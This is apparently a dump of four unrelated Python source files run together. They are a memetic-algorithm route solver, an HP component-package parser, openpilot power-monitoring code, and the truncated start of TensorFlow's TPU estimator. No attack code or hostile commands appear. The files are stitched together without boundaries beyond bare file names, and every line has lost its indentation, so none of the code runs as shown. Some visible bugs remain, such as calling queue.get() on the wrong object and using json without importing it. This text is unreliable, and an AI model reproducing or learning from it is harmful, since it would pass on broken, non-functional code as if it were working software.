new.insert(min_index,self.id_dic[(task_k[0],task_k[1])])
gene1.pop(k1)
gene1.insert(k1,new)
return gene1
def PS(self,unordered_list):
tasklist=[]
for i in unordered_list:
task=self.task_dic[i]
s=int(task[0])
t=int(task[1])
c=self.cost_dic[task]
d=self.demand_dic[task]
if d!=0:
tasklist.append((s,t,c,d,self._depot))
route=[]
gene=[]
now=self._depot
task_sum=0
while len(tasklist)>0:
tasklist.sort(key = lambda x:min(graph._all_distance[now][x[0]],graph._all_distance[now][x[1]]))
min_list=[]
min_dis=min(self._all_distance[now][tasklist[0][0]],self._all_distance[now][tasklist[0][1]])
for i in tasklist:
if min(self._all_distance[now][i[0]],self._all_distance[now][i[1]])==min_dis and i[3]+task_sum<self._capacity :
min_list.append(i)
if min_list==[]:
task_sum=0
gene.append(route)
route=[]
now=self._depot
break
np.random.shuffle(min_list)
min_task=min_list[0]
tasklist.remove(min_task)
task_sum+=min_task[3]
if self._all_distance[now][min_task[0]]<self._all_distance[now][min_task[1]]:
route.append(self.id_dic[(min_task[0],min_task[1])])
else:
route.append(self.id_dic[(min_task[1],min_task[0])])
now=min_task[1]
if now==self._depot:
task_sum=0
gene.append(route)
route=[]
gene.append(route)
task_sum=0
now=self._depot
return self.flatten(gene)
def PS1(self,unordered_list):
tasklist=queue.PriorityQueue()
for i in unordered_list:
task=self.task_dic[i]
s=int(task[0])
t=int(task[1])
c=self.cost_dic[task]
d=self.demand_dic[task]
if d!=0:
tasklist.put_nowait(Edge(s,t,c,d))
candidate=[]
route=[]
gene=[]
now=self._depot
task_sum=0
while not tasklist.empty():
while not tasklist.empty():
leastd=tasklist.get()
if leastd.d+task_sum<=self._capacity:
candidate.append(leastd)
else:
tasklist.put_nowait(leastd)
break
if len(candidate)==0:
task_sum=0
gene.append(route)
route=[]
now=self._depot
else:
min_distance=1000000000
min_list=[]
for i in range(len(candidate)):
taski=candidate[i]
disx=self._all_distance[taski.s][now]
disy=self._all_distance[taski.t][now]
if disx<min_distance :
min_list=[]
min_list.append((i,True))
min_distance=disx
elif disx==min_distance:
min_list.append((i,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((i,False))
min_distance=disy
elif disy==min_distance:
min_list.append((i,False))
min_distance=disy
k=0
max_distance=-1000000
for i in range(len(min_list)):
task=copy.deepcopy(candidate[min_list[i][0]])
s=min_list[i][1]
if not s:
temp=task.s
task.s=task.t
task.t=temp
dis=self._all_distance[self._depot][task.s]
if dis>max_distance:
k=i
max_distance=dis
min_index=min_list[k][0]
min_s=min_list[k][1]
min_task=candidate.pop(min_index)
if not min_s:
temp=min_task.s
min_task.s=min_task.t
min_task.t=temp
for i in candidate:
tasklist.put_nowait(i)
candidate=[]
task_sum+=min_task.d
route.append(self.id_dic[(min_task.s,min_task.t)])
now=min_task.t
gene.append(route)
task_sum=0
now=self._depot
return self.flatten(gene)
def PS2(self,unordered_list):
tasklist=queue.PriorityQueue()
for i in unordered_list:
task=self.task_dic[i]
s=int(task[0])
t=int(task[1])
c=self.cost_dic[task]
d=self.demand_dic[task]
if d!=0:
tasklist.put_nowait(Edge(s,t,c,d))
candidate=[]
route=[]
gene=[]
now=self._depot
task_sum=0
while not tasklist.empty():
while not tasklist.empty():
leastd=tasklist.get()
if leastd.d+task_sum<=self._capacity:
candidate.append(leastd)
else:
tasklist.put_nowait(leastd)
break
if len(candidate)==0:
task_sum=0
gene.append(route)
route=[]
now=self._depot
else:
min_distance=1000000000
min_list=[]
for i in range(len(candidate)):
taski=candidate[i]
disx=self._all_distance[taski.s][now]
disy=self._all_distance[taski.t][now]
if disx<min_distance :
min_list=[]
min_list.append((i,True))
min_distance=disx
elif disx==min_distance:
min_list.append((i,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((i,False))
min_distance=disy
elif disy==min_distance:
min_list.append((i,False))
min_distance=disy
k=0
min_distance=1000000
for i in range(len(min_list)):
task=copy.deepcopy(candidate[min_list[i][0]])
s=min_list[i][1]
if not s:
temp=task.s
task.s=task.t
task.t=temp
dis=self._all_distance[self._depot][task.s]
if dis<min_distance:
k=i
min_distance=dis
min_index=min_list[k][0]
min_s=min_list[k][1]
min_task=candidate.pop(min_index)
if not min_s:
temp=min_task.s
min_task.s=min_task.t
min_task.t=temp
for i in candidate:
tasklist.put_nowait(i)
candidate=[]
task_sum+=min_task.d
route.append(self.id_dic[(min_task.s,min_task.t)])
now=min_task.t
gene.append(route)
task_sum=0
now=self._depot
return self.flatten(gene)
def PS3(self,unordered_list):
tasklist=queue.PriorityQueue()
for i in unordered_list:
task=self.task_dic[i]
s=int(task[0])
t=int(task[1])
c=self.cost_dic[task]
d=self.demand_dic[task]
if d!=0:
tasklist.put_nowait(Edge(s,t,c,d))
candidate=[]
route=[]
gene=[]
now=self._depot
task_sum=0
while not tasklist.empty():
while not tasklist.empty():
leastd=tasklist.get()
if leastd.d+task_sum<=self._capacity:
candidate.append(leastd)
else:
tasklist.put_nowait(leastd)
break
if len(candidate)==0:
task_sum=0
gene.append(route)
route=[]
now=self._depot
else:
min_distance=1000000000
min_list=[]
for i in range(len(candidate)):
taski=candidate[i]
disx=self._all_distance[taski.s][now]
disy=self._all_distance[taski.t][now]
if disx<min_distance :
min_list=[]
min_list.append((i,True))
min_distance=disx
elif disx==min_distance:
min_list.append((i,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((i,False))
min_distance=disy
elif disy==min_distance:
min_list.append((i,False))
min_distance=disy
k=0
max_ratio=-1000000
for i in range(len(min_list)):
task=copy.deepcopy(candidate[min_list[i][0]])
s=min_list[i][1]
if not s:
temp=task.s
task.s=task.t
task.t=temp
ratio=task.d/task.c
if ratio>max_ratio:
k=i
max_ratio=ratio
min_index=min_list[k][0]
min_s=min_list[k][1]
min_task=candidate.pop(min_index)
if not min_s:
temp=min_task.s
min_task.s=min_task.t
min_task.t=temp
for i in candidate:
tasklist.put_nowait(i)
candidate=[]
task_sum+=min_task.d
route.append(self.id_dic[(min_task.s,min_task.t)])
now=min_task.t
gene.append(route)
task_sum=0
now=self._depot
return self.flatten(gene)
def PS4(self,unordered_list):
tasklist=queue.PriorityQueue()
for i in unordered_list:
task=self.task_dic[i]
s=int(task[0])
t=int(task[1])
c=self.cost_dic[task]
d=self.demand_dic[task]
if d!=0:
tasklist.put_nowait(Edge(s,t,c,d))
candidate=[]
route=[]
gene=[]
now=self._depot
task_sum=0
while not tasklist.empty():
while not tasklist.empty():
leastd=tasklist.get()
if leastd.d+task_sum<=self._capacity:
candidate.append(leastd)
else:
tasklist.put_nowait(leastd)
break
if len(candidate)==0:
task_sum=0
gene.append(route)
route=[]
now=self._depot
else:
min_distance=1000000000
min_list=[]
for i in range(len(candidate)):
taski=candidate[i]
disx=self._all_distance[taski.s][now]
disy=self._all_distance[taski.t][now]
if disx<min_distance :
min_list=[]
min_list.append((i,True))
min_distance=disx
elif disx==min_distance:
min_list.append((i,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((i,False))
min_distance=disy
elif disy==min_distance:
min_list.append((i,False))
min_distance=disy
k=0
min_ratio=1000000
for i in range(len(min_list)):
task=copy.deepcopy(candidate[min_list[i][0]])
s=min_list[i][1]
if not s:
temp=task.s
task.s=task.t
task.t=temp
ratio=task.d/task.c
if ratio<min_ratio:
k=i
min_ratio=ratio
min_index=min_list[k][0]
min_s=min_list[k][1]
min_task=candidate.pop(min_index)
if not min_s:
temp=min_task.s
min_task.s=min_task.t
min_task.t=temp
for i in candidate:
tasklist.put_nowait(i)
candidate=[]
task_sum+=min_task.d
route.append(self.id_dic[(min_task.s,min_task.t)])
now=min_task.t
gene.append(route)
task_sum=0
now=self._depot
return self.flatten(gene)
def PS5(self,unordered_list):
tasklist=queue.PriorityQueue()
for i in unordered_list:
task=self.task_dic[i]
s=int(task[0])
t=int(task[1])
c=self.cost_dic[task]
d=self.demand_dic[task]
if d!=0:
tasklist.put_nowait(Edge(s,t,c,d))
candidate=[]
route=[]
gene=[]
now=self._depot
task_sum=0
while not tasklist.empty():
while not tasklist.empty():
leastd=tasklist.get()
if leastd.d+task_sum<=self._capacity:
candidate.append(leastd)
else:
tasklist.put_nowait(leastd)
break
if len(candidate)==0:
task_sum=0
gene.append(route)
route=[]
now=self._depot
else:
min_distance=1000000000
min_list=[]
for i in range(len(candidate)):
taski=candidate[i]
disx=self._all_distance[taski.s][now]
disy=self._all_distance[taski.t][now]
if disx<min_distance :
min_list=[]
min_list.append((i,True))
min_distance=disx
elif disx==min_distance:
min_list.append((i,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((i,False))
min_distance=disy
elif disy==min_distance:
min_list.append((i,False))
min_distance=disy
k=0
if task_sum<self._capacity/2:
max_distance=-1000000
for i in range(len(min_list)):
task=copy.deepcopy(candidate[min_list[i][0]])
s=min_list[i][1]
if not s:
temp=task.s
task.s=task.t
task.t=temp
dis=self._all_distance[self._depot][task.s]
if dis>max_distance:
k=i
max_distance=dis
else:
min_distance=1000000
for i in range(len(min_list)):
task=copy.deepcopy(candidate[min_list[i][0]])
s=min_list[i][1]
if not s:
temp=task.s
task.s=task.t
task.t=temp
dis=self._all_distance[self._depot][task.s]
if dis<min_distance:
k=i
min_distance=dis
min_index=min_list[k][0]
min_s=min_list[k][1]
min_task=candidate.pop(min_index)
if not min_s:
temp=min_task.s
min_task.s=min_task.t
min_task.t=temp
for i in candidate:
tasklist.put_nowait(i)
candidate=[]
task_sum+=min_task.d
route.append(self.id_dic[(min_task.s,min_task.t)])
now=min_task.t
gene.append(route)
task_sum=0
now=self._depot
return self.flatten(gene)
def memetic_evolution(self,psize):
pop=[]
gene_set=set()
q_dict={}
while len(pop)<psize:
trial=0
copy_gene=None
tuple_gene=None
while True:
trial+=1
copy_gene=self.get_gene()
tuple_gene=self.list_2_tuple(copy_gene)
if trial==50 or tuple_gene not in gene_set:
break
if tuple_gene in gene_set:
break
pop.append(copy_gene)
gene_set.add(tuple_gene)
q_dict[tuple_gene]=self.get_q(copy_gene)
psize=len(pop)
while time.time()-start<float(termin_time):
popt=copy.deepcopy(pop)
sett=copy.deepcopy(gene_set)
for i in range(6*psize):
if time.time()-start>float(termin_time):
break
s1=random.randint(0,psize-1)
s2=random.randint(0,psize-1)
while s1==s2:
s2=random.randint(0,psize-1)
S1=pop[s1]
S2=pop[s2]
Sx_gene=self.cross_over(copy.deepcopy(S1),copy.deepcopy(S2))
# print(f's1 {self.get_q(S1)} s2 {self.get_q(S2)} s3 {self.get_q(Sx_gene)}')
r= random.random()
if r<0.2:
rr=random.random()
Sls_gene=None
if rr<0.33:
Sls_gene=self.single_local_search(Sx_gene)
elif rr<0.66:
Sls_gene=self.double_local_search(Sx_gene)
else:
Sls_gene=self.swap_local_search(Sx_gene)
Sls_tuple=self.list_2_tuple(Sls_gene)
Sx_tuple=self.list_2_tuple(Sx_gene)
q_dict[Sls_tuple]=self.get_q(Sls_gene)
q_dict[Sx_tuple]=self.get_q(Sx_gene)
ms_gene=self.MS_local_search(Sls_gene)
ms_q=self.get_q(ms_gene)
q_dict[self.list_2_tuple(ms_gene)]=ms_q
if ms_q<q_dict[Sls_tuple]:
Sls_gene=ms_gene
if Sls_tuple not in sett:
popt.append(Sls_gene)
sett.add(Sls_tuple)
elif Sx_tuple not in sett:
popt.append(Sx_gene)
sett.add(Sx_tuple)
else:
Sx_tuple=self.list_2_tuple(Sx_gene)
if Sx_tuple not in sett:
popt.append(Sx_gene)
sett.add(Sx_tuple)
q_dict[Sx_tuple]=self.get_q(Sx_gene)
rank=queue.PriorityQueue()
for i in popt:
rank.put_nowait(Individual(i,q_dict[self.list_2_tuple(i)]))
pop=[]
for i in range(psize):
pop.append(rank.get().gene)
min_gene=None
min_value=1000000000000
for i in pop:
q=q_dict[self.list_2_tuple(i)]
if q<min_value:
min_gene=i
min_value=q
self.gene_output(min_gene)
return min_gene
def memetic_evolution2(self,psize):
population=queue.PriorityQueue()
gene_set=set()
counter=0
while time.time()-start<float(termin_time)/2:
r=np.random.rand()
if r>0.5:
copy_gene=self.get_gene2()
else:
copy_gene=self.get_gene()
tuple_gene=self.list_2_tuple(copy_gene)
if tuple_gene not in gene_set:
counter+=1
gene_set.add(tuple_gene)
new_individual=Individual(copy_gene, self.get_q(copy_gene))
population.put_nowait(new_individual)
g=0
while time.time()-start<float(termin_time):
g+=1
poplist=[]
for i in range(psize):
poplist.append(population.get())
s1=random.randint(0,psize-1)
s2=random.randint(0,psize-1)
while s1==s2:
s2=random.randint(0,psize-1)
S1=poplist[s1]
S2=poplist[s2]
Sx_gene=self.cross_over(copy.deepcopy(S1.gene),copy.deepcopy(S2.gene))
# print(f's1 {self.get_q(S1.gene)} s2 {self.get_q(S2.gene)} s3 {self.get_q(Sx_gene)}')
tuple_Sx=self.list_2_tuple(Sx_gene)
if tuple_Sx not in gene_set:
counter+=1
gene_set.add(tuple_Sx)
Sx=Individual(Sx_gene, self.get_q(Sx_gene))
population.put_nowait(Sx)
r= random.random()
if r<0.2:
rp= random.random()
Sls_gene=None
if rp <0.3:
Sls_gene=self.single_local_search(Sx_gene)
elif rp<0.6:
Sls_gene=self.double_local_search(Sx_gene)
else:
Sls_gene=self.swap_local_search(Sx_gene)
tuple_Sls=self.list_2_tuple(Sls_gene)
if tuple_Sls not in gene_set:
counter+=1
gene_set.add(tuple_Sls)
Sls=Individual(Sls_gene, self.get_q(Sls_gene))
population.put_nowait(Sls)
MS_Sls_gene=self.MS_local_search(Sls_gene)
tuple_Sls=self.list_2_tuple(MS_Sls_gene)
# print(f's1 {self.get_q(S1.gene)} s2 {self.get_q(S2.gene)} s3 {self.get_q(Sx_gene)} Sls {self.get_q(Sls_gene)} Ms {self.get_q(MS_Sls_gene)}')
if tuple_Sls not in gene_set:
counter+=1
gene_set.add(tuple_Sls)
Sls=Individual(MS_Sls_gene, self.get_q(MS_Sls_gene))
population.put_nowait(Sls)
for i in range(psize):
population.put_nowait(poplist[i])
best=population.get()
self.gene_output(best.gene)
return best.gene
def mul_BIH(self,population):
gene_set=set()
counter=0
misstime=0
while time.time()-start<float(termin_time):
copy_gene=self.get_gene2()
tuple_gene=self.list_2_tuple(copy_gene)
if tuple_gene not in gene_set:
counter+=1
gene_set.add(tuple_gene)
new_individual=Individual(copy_gene, self.get_q(copy_gene))
population.put(new_individual)
misstime=0
else:
misstime+=1
if misstime>100:
break
# best=population.get()
# self.gene_output(best.gene)
graph=Graph(vertices,depot,required,non_required,vehicles,capacity,total_cost,edge_list)
if __name__=='__main__':
population=Queue()
processes =[Process(target=graph.mul_BIH,args=(population,)) for _ in range(8)]
for p in processes:
p.start()
for p in processes:
p.join()
results=[queue.get() for _ in processes]
results.sort()
graph.gene_output(results[0].gene) |
smartcomponent.py | #####################################################
#
# smartcomponent.py
#
# Copyright 2007 Hewlett-Packard Development Company, L.P.
#
# Hewlett-Packard and the Hewlett-Packard logo are trademarks of
# Hewlett-Packard Development Company, L.P. in the U.S. and/or other countries.
#
# Confidential computer software. Valid license from Hewlett-Packard required
# for possession, use or copying. Consistent with FAR 12.211 and 12.212,
# Commercial Computer Software, Computer Software Documentation, and Technical
# Data for Commercial Items are licensed to the U.S. Government under
# vendor's standard commercial license.
#
# Author:
# James Abendroth
#
# Description:
# Manages Smart Component objects for Breckenridge.
#
#####################################################
import os
import tarfile
import tempfile
from xml.dom.minidom import parse
from threading import Thread
import logging
log = logging.getLogger(__name__)
SC_SHARE_PATH='static/sc_share'
class SmartComponent:
def __init__(self):
self.version = "Unknown"
self.name = "Unknown Component"
self.filename = ""
def __repr__(self):
return str(self.__dict__)
def json(self):
return json.dumps(self.__dict__)
class SmartComponentManager:
def __init__(self):
self.components = []
self.path = os.path.abspath(SC_SHARE_PATH)
log.debug("Initializing SmartComponentManager")
def get_sc_file_list(self):
for root, directories, files in os.walk(self.path):
return files
def delete_component(self, sc_filename):
sc_path = self.path + '\\' + sc_filename
try:
os.remove(sc_path)
for component in self.components:
if component.filename == sc_filename:
self.components.remove(component)
except:
pass
def discover_components(self):
t = Thread(target=self.do_discover_components)
t.daemon = True
t.start()
def do_discover_components(self):
files = self.get_sc_file_list()
if files:
for file in files:
if file.lower().endswith('.scexe') :
log.debug("Discovered component %s", file)
self.add_component(file)
def add_component(self, filename):
log.debug("Adding component %s", filename)
if filename in [c.filename for c in self.components ] :
log.error("Component %s already added", filename)
return False
component = SmartComponent()
component.filename = filename
digest_filename = self.extract_component_digest(filename)
if digest_filename != "":
self.parse_digest(digest_filename, component)
# Remove the digest file.
try:
os.remove(self.path + '\\' + digest_filename)
except:
log.exception("Error removing digest file %s", digest_filename)
pass
self.components.append(component)
# Each smart component should have an XML file inside. We'll use
# tar to extract that file and obtain information about the component.
# This function will return the filename of the xml file after it
# has been extracted from the archive.
def extract_component_digest(self, sc_filename):
# The first step is to find the line where the tarfile starts.
sc_path = self.path + '\\' + sc_filename
sc_file = open(sc_path, "rb")
line_offset = -1
while True:
buf = sc_file.read(1024)
if buf == "":
break
skip_idx = buf.find("_SKIP=")
if (skip_idx != -1):
buf = buf[(skip_idx+6):]
newline = buf.find('\n')
line_offset = buf[0:newline]
break
# We didn't find the line offset. We can't go any further.
if line_offset == -1:
sc_file.close()
log.error("Unable to find tar offset in %s", sc_filename)
return ""
line_offset = int(line_offset)-1
sc_file.seek(0)
log.debug("tar file in %s at offset %d", sc_filename, line_offset)
# Now that we have our line offset, move to the correct position in the file.
for line in range(0, line_offset):
sc_file.readline()
tar_file = tempfile.mkstemp(dir=self.path)
while True:
buf = sc_file.read(1024)
if buf == "":
break
os.write(tar_file[0], buf)
sc_file.close()
os.close(tar_file[0])
# Now we should have a good tarfile to extract the digest.
digest_name = ""
try:
tf = tarfile.open(tar_file[1], 'r')
for filename in tf.getnames() :
if filename.lower() == sc_filename.lower().replace('.scexe', '.xml') :
digest_name = filename
log.debug("Extracting %s from tar", digest_name)
tf.extract(digest_name, self.path)
tf.close()
os.remove(tar_file[1])
break
except:
log.exception("Error getting XML file name from %s", sc_filename)
os.remove(tar_file[1])
tf.close()
if not digest_name :
log.error("Unable to find component xml file in %s", sc_filename)
return digest_name
# Parses the digest file and adds the required attributes to the SmartComponent object.
def parse_digest(self, filename, component):
log.debug("Parsing %s", filename)
digest_dom = None
try:
digest_dom = parse(self.path + '\\' + filename)
except:
log.exception("Error parsing file %s",filename)
return None
package_elem = digest_dom.getElementsByTagName('cpq_package')
if not package_elem:
log.error("No cpq_package found")
return None
package_elem = package_elem[0]
version_elem = None
name_elem = None
for node in package_elem.childNodes:
if node.nodeName == 'version':
version_elem = node
elif node.nodeName == 'name':
name_elem = node
# Add the version from the version element's value attribute.
if version_elem:
component.version = version_elem.getAttribute('value')
log.debug("%s component version: %s", component.filename, component.version)
else :
log.error("Error: no component version in %s", filename)
if name_elem:
for node in name_elem.childNodes:
if node.nodeName == "name_xlate" and node.getAttribute("lang") == "en":
for cn in node.childNodes:
component.name = cn.wholeText
log.debug("%s component name: %s", component.filename, component.name)
else :
log.error("Error: no component name in %s", filename)
def json(self):
json_list = []
for component in self.components:
json_list.append(component.__dict__)
return json_list
# The main smart component manager object.
__scm = SmartComponentManager()
def get_scm():
return __scm
|
power_monitoring.py | import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0
MAX_TIME_OFFROAD_S = 30*3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of health voltage
self.integration_lock = threading.Lock()
self.ts_last_charging_ctrl = None
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, health, msg):
try:
now = sec_since_boot()
# If health is None, we're probably not in a car, so we don't care
if health is None or health.health.hwType == log.HealthData.HwType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_mV = ((health.health.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (health.health.ignitionLine or health.health.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = health.health.hwType == log.HealthData.HwType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw()
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, health, offroad_timestamp):
if health is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not health.health.ignitionLine and not health.health.ignitionCan)
disable_charging &= (self.params.get("DisablePowerDown") != b"1")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, health, offroad_timestamp, started_seen, LEON):
if health is None or offroad_timestamp is None:
return False
if HARDWARE.get_battery_charging():
return False
now = sec_since_boot()
panda_charging = (health.health.usbPowerMode != log.HealthData.UsbPowerMode.client)
BATT_PERC_OFF = 90 # 10 if LEON else 3
delta_ts = now - offroad_timestamp
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(health, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and (delta_ts > 10) )
should_shutdown &= started_seen
return should_shutdown
def charging_ctrl(self, msg, ts, to_discharge, to_charge ):
if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
battery_changing = HARDWARE.get_battery_charging()
if self.ts_last_charging_ctrl:
if msg.thermal.batteryPercent >= to_discharge and battery_changing:
HARDWARE.set_battery_charging(False)
elif msg.thermal.batteryPercent <= to_charge and not battery_changing:
HARDWARE.set_battery_charging(True)
self.ts_last_charging_ctrl = ts |
tpu_estimator.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.summary import summary_ops as contrib_summary
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
